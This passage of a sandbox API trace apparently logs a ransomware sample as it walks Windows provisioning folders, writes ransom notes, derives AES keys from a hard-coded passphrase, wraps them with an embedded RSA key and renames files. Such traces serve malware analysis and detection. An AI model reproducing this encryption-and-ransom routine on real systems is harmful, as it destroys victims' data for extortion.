(hHash=0x2817458) returned 1 [0237.290] CryptDestroyKey (hKey=0x2817a18) returned 1 [0237.290] CryptReleaseContext (hProv=0x2832f28, dwFlags=0x0) returned 1 [0237.290] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0237.290] FindClose (in: hFindFile=0x2817298 | out: hFindFile=0x2817298) returned 1 [0237.290] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\readme_back_files.htm")) returned 0xffffffff [0237.290] AreFileApisANSI () returned 1 [0237.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e29b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0237.290] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.290] GetLastError () returned 0x5 [0237.290] GetLastError () returned 0x5 [0237.290] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.290] FindClose (in: hFindFile=0x2817098 | out: hFindFile=0x2817098) returned 1 [0237.291] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\readme_back_files.htm")) returned 0xffffffff [0237.291] AreFileApisANSI () returned 1 [0237.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0237.291] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.291] GetLastError () returned 0x5 [0237.291] GetLastError () returned 0x5 [0237.291] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.291] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2817098 [0237.293] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.293] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.293] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.293] GetLastError () returned 0x5 [0237.293] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml")) returned 0x20 [0237.294] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0237.294] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.295] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.295] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.295] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2832f28) returned 1 [0237.300] CryptCreateHash (in: hProv=0x2832f28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.300] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.300] CryptHashData (hHash=0x2817298, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.300] CryptDeriveKey (in: hProv=0x2832f28, Algid=0x6610, hBaseData=0x2817298, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2817858) returned 1 [0237.300] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.300] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.300] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2833d80) returned 1 [0237.301] CryptImportPublicKeyInfo (in: hCryptProv=0x2833d80, dwCertEncodingType=0x1, pInfo=0x283b088*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283b0b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283b0c0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2817a18) returned 1 [0237.302] CryptEncrypt (in: hKey=0x2817a18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.302] CryptEncrypt (in: hKey=0x2817a18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28337a8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28337a8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.302] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28337a8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.302] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279b788, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279b788, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.302] CryptEncrypt (in: hKey=0x2817858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279b788*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279b788*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.302] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279b788, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.302] CloseHandle (hObject=0xffffffff) returned 1 [0237.302] CloseHandle (hObject=0xffffffff) returned 1 [0237.302] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml"), bFailIfExists=0) returned 0 [0237.303] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0237.303] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.gsg")) returned 0 [0237.303] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml.fuck")) returned 0 [0237.304] CryptDestroyHash (hHash=0x2817298) returned 1 [0237.304] CryptDestroyKey (hKey=0x2817858) returned 1 [0237.304] CryptReleaseContext (hProv=0x2832f28, dwFlags=0x0) returned 1 [0237.304] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.304] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.304] GetLastError () returned 0x5 [0237.304] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml")) returned 0x20 [0237.304] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0237.304] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.305] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.305] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.305] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2832f28) returned 1 [0237.311] CryptCreateHash (in: hProv=0x2832f28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.311] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.311] CryptHashData (hHash=0x2817298, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.311] CryptDeriveKey (in: hProv=0x2832f28, Algid=0x6610, hBaseData=0x2817298, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2817858) returned 1 [0237.311] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.311] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.311] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28338b8) returned 1 [0237.312] CryptImportPublicKeyInfo (in: hCryptProv=0x28338b8, dwCertEncodingType=0x1, pInfo=0x283aa08*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283aa38*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283aa40*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2716b68) returned 1 [0237.312] CryptEncrypt (in: hKey=0x2716b68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.312] CryptEncrypt (in: hKey=0x2716b68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2833940*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2833940*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.313] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2833940, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.313] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277daf8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277daf8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.313] CryptEncrypt (in: hKey=0x2817858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277daf8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x277daf8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.313] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277daf8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.313] CloseHandle (hObject=0xffffffff) returned 1 [0237.313] CloseHandle (hObject=0xffffffff) returned 1 [0237.313] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0237.313] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0237.314] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml.gsg")) returned 0 [0237.314] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml.fuck")) returned 0 [0237.314] CryptDestroyHash (hHash=0x2817298) returned 1 [0237.314] CryptDestroyKey (hKey=0x2817858) returned 1 [0237.314] CryptReleaseContext (hProv=0x2832f28, dwFlags=0x0) returned 1 [0237.314] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.314] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x27175e8 [0237.315] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.315] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.315] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x27170a8 [0237.315] FindNextFileA (in: hFindFile=0x27170a8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.315] FindNextFileA (in: hFindFile=0x27170a8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.315] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.315] GetLastError () returned 0x5 [0237.315] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0237.315] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0237.316] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.316] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.316] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.316] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2793100) returned 1 [0237.322] CryptCreateHash (in: hProv=0x2793100, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.322] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.322] CryptHashData (hHash=0x2817298, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.322] CryptDeriveKey (in: hProv=0x2793100, Algid=0x6610, hBaseData=0x2817298, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2817858) returned 1 [0237.322] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.322] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.322] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2832f28) returned 1 [0237.323] CryptImportPublicKeyInfo (in: hCryptProv=0x2832f28, dwCertEncodingType=0x1, pInfo=0x283aba8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283abd8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283abe0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x394b28) returned 1 [0237.323] CryptEncrypt (in: hKey=0x394b28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.323] CryptEncrypt (in: hKey=0x394b28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28339c8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28339c8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.323] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28339c8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.324] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.324] CryptEncrypt (in: hKey=0x2817858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.324] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.324] CloseHandle (hObject=0xffffffff) returned 1 [0237.324] CloseHandle (hObject=0xffffffff) returned 1 [0237.324] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0237.324] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0237.324] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0237.325] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml" (normalized: 